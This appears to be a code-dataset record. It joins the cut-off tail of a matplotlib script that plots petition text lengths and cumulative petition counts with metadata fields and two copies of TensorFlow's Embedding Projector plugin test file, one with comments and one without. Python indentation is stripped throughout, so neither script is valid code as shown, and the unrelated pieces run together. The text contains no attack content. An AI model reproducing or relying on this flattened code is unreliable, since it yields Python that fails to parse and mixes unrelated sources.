if len(met[i]['petition']['description']) ==1000:
            print(met[i]['petition']['description'])
fig=plt.figure(figsize=(4.5, 4.5))
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
    plt.hist(s, bins=1000)
plt.title("Histogram of textlengths")
plt.ylabel("Number of petitions")
plt.xlabel("Length of text")
plt.tight_layout()
""" this plots the distr of len(text) """
if False:
for i in range(len(met)):
if met[i]['petition']['signature_count'] >1000:
s.append( len(met[i]['petition']['description']))
s2.append( len(met[i]['petition']['description']))
plt.rcParams.update({'font.size': 12})
plt.rc('font', family='serif')
    _, bins, _ = plt.hist(s, bins=50)
fig, ax1 = plt.subplots()
fig.set_size_inches(7,4.5)
ax1.hist(s2,bins=bins,color='k',histtype='step')
ax1.set_ylabel('Petitions', color='k')
ax2 = ax1.twinx()
ax2.hist(s,bins=bins,color='b',histtype='step')
ax2.set_ylabel('Petitions with \n >1,000 signatures',color='b')
plt.title("Histogram of textlengths")
ax1.set_xlabel("Length of text")
plt.show()
fig.tight_layout()
fig.savefig('textlen_s_dist', dpi=500)
""" this plots the cum number of len(text)"""
if False:
k=0
for i in range(len(met)):
k=k+1
t = met[i]['petition']['created_datetime']
        dt = t[0:10]
t0 = datetime.datetime(int(dt[0:4]),int(dt[5:7]),int(dt[8:10]))
s.append(t0)
s2.append(k)
fig, ax = plt.subplots()
fig.set_size_inches(8,3)
plt.rcParams.update({'font.size': 15})
plt.rc('font', family='serif')
ax.plot(s,s2,color='darkblue')
plt.title("Cumulative number of petitions")
plt.ylabel("Number of Petitions",fontsize=15)
ax.set_xlim([734300,735687])
for label in ax.xaxis.get_ticklabels()[1::2]:
label.set_visible(False)
ax.xaxis.get_ticklabels()[0].set_visible(True)
ax.xaxis.get_ticklabels()[-1].set_visible(True)
ax.tick_params(axis='both', which='major', labelsize=10)
plt.tight_layout()
fig.savefig('pets_vs_time', dpi=500)
if False:
for i in range(len(met)):
if int(met[i]['petition']['signature_count'])<100000 and int(met[i]['petition']['signature_count'])>5000:
            print(met[i]['petition']['id'], met[i]['petition']['signature_count'])
| false
| true
|
790b3468a36f769806063323bf41611a538801a6
| 5,280
|
py
|
Python
|
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/tensorboard/plugins/projector/projector_plugin_test.py
|
garston2/tensorflow
|
bbe056e5a0ab81b67fcb6053400812b3d5805fc7
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Integration tests for the Embedding Projector."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import io
import json
import os
import numpy as np
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.projector import projector_plugin
class ProjectorAppTest(test.TestCase):
def setUp(self):
self.log_dir = self.get_temp_dir()
def testRunsWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['.'])
def testRunsWithNoCheckpoint(self):
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testRunsWithInvalidModelCheckpointPath(self):
checkpoint_file = os.path.join(self.log_dir, 'checkpoint')
f = open(checkpoint_file, 'w')
f.write('model_checkpoint_path: "does_not_exist"\n')
f.write('all_model_checkpoint_paths: "does_not_exist"\n')
f.close()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testInfoWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
info_json = self._GetJson('/data/plugin/projector/info?run=.')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testTensorWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
url = '/data/plugin/projector/tensor?run=.&name=var1'
tensor_bytes = self._Get(url).data
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def _SetupWSGIApp(self):
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
projector = projector_plugin.ProjectorPlugin()
projector.get_plugin_apps(multiplexer, self.log_dir)
plugins = {'projector': projector}
wsgi_app = application.TensorBoardWSGIApp(
self.log_dir, plugins, multiplexer, reload_interval=0)
self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def _Get(self, path):
return self.server.get(path)
def _GetJson(self, path):
response = self.server.get(path)
data = response.data
if response.headers.get('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, io.BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def _GenerateProjectorTestData(self):
config_path = os.path.join(self.log_dir, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
# Add an embedding by its canonical tensor name.
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
# Write a checkpoint with some dummy variables.
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(self.log_dir, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
if __name__ == '__main__':
test.main()
| 36.413793
| 97
| 0.726136
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import gzip
import io
import json
import os
import numpy as np
from werkzeug import test as werkzeug_test
from werkzeug import wrappers
from google.protobuf import text_format
from tensorflow.contrib.tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorflow.core.protobuf import saver_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import gfile
from tensorflow.python.platform import test
from tensorflow.python.training import saver as saver_lib
from tensorflow.tensorboard.backend import application
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.plugins.projector import projector_plugin
class ProjectorAppTest(test.TestCase):
def setUp(self):
self.log_dir = self.get_temp_dir()
def testRunsWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, ['.'])
def testRunsWithNoCheckpoint(self):
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testRunsWithInvalidModelCheckpointPath(self):
checkpoint_file = os.path.join(self.log_dir, 'checkpoint')
f = open(checkpoint_file, 'w')
f.write('model_checkpoint_path: "does_not_exist"\n')
f.write('all_model_checkpoint_paths: "does_not_exist"\n')
f.close()
self._SetupWSGIApp()
run_json = self._GetJson('/data/plugin/projector/runs')
self.assertEqual(run_json, [])
def testInfoWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
info_json = self._GetJson('/data/plugin/projector/info?run=.')
self.assertItemsEqual(info_json['embeddings'], [{
'tensorShape': [1, 2],
'tensorName': 'var1'
}, {
'tensorShape': [10, 10],
'tensorName': 'var2'
}, {
'tensorShape': [100, 100],
'tensorName': 'var3'
}])
def testTensorWithValidCheckpoint(self):
self._GenerateProjectorTestData()
self._SetupWSGIApp()
url = '/data/plugin/projector/tensor?run=.&name=var1'
tensor_bytes = self._Get(url).data
tensor = np.reshape(np.fromstring(tensor_bytes, dtype='float32'), [1, 2])
expected_tensor = np.array([[6, 6]], dtype='float32')
self.assertTrue(np.array_equal(tensor, expected_tensor))
def _SetupWSGIApp(self):
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=application.DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=True)
projector = projector_plugin.ProjectorPlugin()
projector.get_plugin_apps(multiplexer, self.log_dir)
plugins = {'projector': projector}
wsgi_app = application.TensorBoardWSGIApp(
self.log_dir, plugins, multiplexer, reload_interval=0)
self.server = werkzeug_test.Client(wsgi_app, wrappers.BaseResponse)
def _Get(self, path):
return self.server.get(path)
def _GetJson(self, path):
response = self.server.get(path)
data = response.data
if response.headers.get('Content-Encoding') == 'gzip':
data = gzip.GzipFile('', 'rb', 9, io.BytesIO(data)).read()
return json.loads(data.decode('utf-8'))
def _GenerateProjectorTestData(self):
config_path = os.path.join(self.log_dir, 'projector_config.pbtxt')
config = ProjectorConfig()
embedding = config.embeddings.add()
embedding.tensor_name = 'var1:0'
config_pbtxt = text_format.MessageToString(config)
with gfile.GFile(config_path, 'w') as f:
f.write(config_pbtxt)
with ops.Graph().as_default():
sess = session.Session()
checkpoint_path = os.path.join(self.log_dir, 'model')
variable_scope.get_variable(
'var1', [1, 2], initializer=init_ops.constant_initializer(6.0))
variable_scope.get_variable('var2', [10, 10])
variable_scope.get_variable('var3', [100, 100])
sess.run(variables.global_variables_initializer())
saver = saver_lib.Saver(write_version=saver_pb2.SaverDef.V1)
saver.save(sess, checkpoint_path)
if __name__ == '__main__':
test.main()
| true
| true
|